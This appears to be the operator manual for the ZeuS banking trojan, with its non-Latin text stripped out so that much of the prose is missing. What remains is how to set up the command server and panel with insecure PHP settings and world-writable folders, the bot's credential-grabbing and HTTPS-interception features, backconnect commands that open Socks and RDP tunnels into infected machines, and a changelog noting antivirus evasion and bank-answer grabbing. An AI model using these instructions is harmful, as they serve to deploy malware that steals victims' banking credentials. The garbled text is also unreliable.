  ()
***********************************

==============
=  =
==============

1.   .
2.  .
  2.1. HTTP-.
  2.2.  PHP.
  2.3. MySQL-.
  2.4.  .
    2.4.1. .
    2.4.2. .
    2.4.3.  /system/fsarc.php.
3.  .
4.   BackConnect.
5.  .
6. F.A.Q.
7. .

==============================
= 1.   . =
==============================
ZeuS -           Windows.  
  "", "", "".      ,    
      "". 

     WinAPI  UserMode (Ring3),  ,    
-     Ring0.        
   Windows.     ,  
   Windows.

   Visual C++  9.0+,      
 msvcrt, ATL, MFC, QT  ..       (  ):
  1.  (       ..),
  2.        (  ,     ..),
  3.      (   while(1){..}, for(int i = 0; i < strlen(str); i++){..}).

   :
  1.     TCP.
     1.1.  FTP    .
     1.2.  POP3    .
     1.3.      ( ).
  
  2.  HTTP/HTTPS   wininet.dll, ..     
     .   Internet Explorer ( ), Maxton,  ..
     2.1.  ..
     
  3.  .
     3.1 Socks4/4a/5.
     3.2    (RDP, Socks, FTP, ...)   .  
            ,    NAT, , ,  
            .
     3.3      .
--   ---

=========================
= 2.  . =
=========================
     ,     ,
   .     " "  "VDS", ..
  ,     ,      
   .   " " (),   
:

1. 2 .
2. 2x   2, 
3. SATA  7200rpm+

    HTTP-   PHP + Zend Optimizer,  MySQL-. 

:  Windows-   ()   :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\MaxUserPort=dword:65534
()

---------------------
- 2.1. HTTP-. -
---------------------
  HTTP-  :  nix- - Apache   2.2, 
Windows- - IIS   6.0.   HTTP-  80  443  (
    ,  /     ,
 ).

 Apache: http://apache.org/dyn/closer.cgi
 IIS: http://www.iis.net/

---------------------------
- 2.2.  PHP. -
---------------------------
      PHP 5.2.6.    
 ,    .       5.2.

     php.ini:

safe_mode = Off
magic_quotes_gpc = Off
magic_quotes_runtime = Off
memory_limit = 256M  ; .
post_max_size = 100M ; .

     :

display_errors = Off

   Zend Optimizer (  ,   
).    3.3.

   PHP  HTTP-  CGI.

 PHP: http://www.php.net/downloads.php
 Zend Optimizer: http://www.zend.com/en/products/guard/downloads

----------------------
- 2.3. MySQL-. -
----------------------
MySQL       .     5.1.30,  
 ,            
.        MyISAM,   
    ,     .

      MySQL- (my  my.ini):

max_connections=2000 # 

 MySQL: http://dev.mysql.com/downloads/

---------------------------
- 2.4.  . -
---------------------------

2.4.1. .
*****************
   :
/install           - .
/system            -  .
/system/fsarc.php  -      ( 2.4.3).
/system/config.php -  .
/theme             -   (),  ,   .
cp.php             -    .
gate.php           -   .
index.php          -      .

         server[php].    
          HTTP.      
FTP,        .

 nix-  :
/.      - 777
/system - 777
/tmp    - 777

 Windows-:
\system -      ,        
           HTTP.  IIS   IUSR_*.
\tmp    -     \system.

     ,       URL
http:////install/index.php.   ,    
 (   )   ,    , 
     .

 ,    install,    cp.php (  
 )  gate.php (  )       ( 
).

       ,    URL 
 cp.php.

2.4.2. .
******************
       ,     ,  
  :

1)        .
2)   cp.php  gate.php        
     .
3)   ,        2.4.
4)      URL http:////install/index.php, 
     .       
    ,    ,       .
5)     .

2.4.3.  /system/fsarc.php.
******************************
         .    
    "::  " (reports_files),    
      .       Zip,  
  Windows  nix,      ,      
,      .         
 .

 Zip: http://www.info-zip.org/Zip.html.

======================
= 3.  . =
======================

===========================
= 4.   BackConnect =
===========================
  BackConnect    .

IP BackConnect- : 192.168.100.1 
  : 4500
   : 1080

1)   (zsbcs.exe  zsbcs64.exe)     IP 
   ,    ,      ,   
       .  zsbcs.exe listen -cp:1080 -bp:4500,
    1080 -  , 4500 -   .

2)     bc_add service server_host server_port,  service - 
      * ,      . 
   
   *      socks,      
    Socks-.

   server_host - ,     .     IPv4,
                 IPv6,  .
   server_port - ,     cp  .    4500.

   : bc_add socks 192.168.100.1 4500 -     socks,
           bc_add 3389  192.168.100.1 4500 -     rdp.

3)       ,      
       (   ). 
    ,       "Accepted new conection from bot...".

4)   ,       . ..  
         (   1080). ,   
    socks,        Socks-,    3389, 
      192.168.100:1080    RDP.

5)  ,     BackConnect     ,  
    bc_del service server_host server_port,      
    bc_add,   .     . 
   '*'  '?'.

   : bc_del * * * -   BackConnect',   .
             bc_del * 192.168.* *   BackConnect,     IP 192.168.*.
             bc_del 3389 192.168.100.1 4500 -    BackConnect.

: 
1)      BackConnect' (.. bc_add),       
    IP + Port.      ,    .
2)   BackConnect',      .
3)    ( ,    ..),    
     (   PC),     BackConnect   
   (.. bc_del).
4)   service  bc_add,         127.0.0.1.
5)    IPv6,          
   .
6)      wine.   elf     
   .   
7)      bp     (80, 8080,
   443  ..), ..         .
8)             .
9)        ,    NAT, .. 
    Windows  ,      .

:        .

======================
= 5.  . =
======================
 :
  [*] - .
  [-] - .
  [+] - .

[ 1.2.0.0, 20.12.2008]
  :
    [*]      chm-,      .
    [+]          ,    
        /.
    [+]  ,   ,     RC4   
         .
    [*]     <-> . ,    .
  
  :
    [-]  ,       Windows.
    [*]   PE-,  PE-     
           MS Linker 9.0.
    [*]      .
    [*]    .
    [*]     .
    [*]      .
    [*] Socks  LC     .
  
   :
    [*]      BETA.
    [*]    MySQL.
    [*]       UTF-8 (   
         ).
    [*]  .

[ 1.2.1.0, 30.12.2008]
  :
    [*] BOFA Answers    BLT_GRABBED_HTTP ( BLT_HTTPS_REQUEST).
    [-]     .
    [-]      ~550 .
    [-]      :     POST-, 
              ( ~1 )   
         ( ),    -    
        .
  
  :  
    [+]      BLT_HTTP_REQUEST  BLT_HTTPS_REQUEST   SBCID_PATH_SOURCE
        (   path_source)   URL.
  
   :
    [*]  redir.php.

[ 1.2.2.0, 11.03.2009]
  :
    [-]    HTTP-      . 
             wininet.dll,   
           wininet.dll,   ,   
         .
    [+]   HTTP-,       .
          ,     HTTP-.
    [+]   PE-.

[ 1.2.3.0, 28.03.2009]
  :
    [-]    ,     Avira.

  :  
    [*]     .
  
   :
    [*]    .
    [*]    XHTML 1.0 Strict ( IE  ).
    [*]            - 
        (  ).
    [*]  .

[ 1.2.4.0, 02.04.2009]
  :
    [+]    HTTP,  User-Agent    Internet Explorer,  
           .  -  User-Agent', 
          ,    .

   :
    [-]    ,   0-31  127-159.

=============
= 6. F.A.Q. =
=============
Q:     ?
A: a.b.c.d
    a -     . 
    b -  ,        
        .
    c -  , ,  .
    d -        a.b.c.

Q:    Bot ID?
A: Bot ID    : %name%_%number%,  name -   ( 
   GetComputerName),  number -  ,       .

Q:       (RC4),    (RSA)?
A:  ,      ,     
   .   RSA ,          ,  
      .       (  
   )?

Q:   /  ,  ?
A:  ,    2.5.

===========
= 7.  =
===========
M: ZeuS  DLL   .
A: .     PE  (exe). Dll, sys  ..     
    - .      ,      
    ,     .
   
M: ZeuS  COM ()   Internet Explorer.
A: .      WinAPI  wininet.dll.
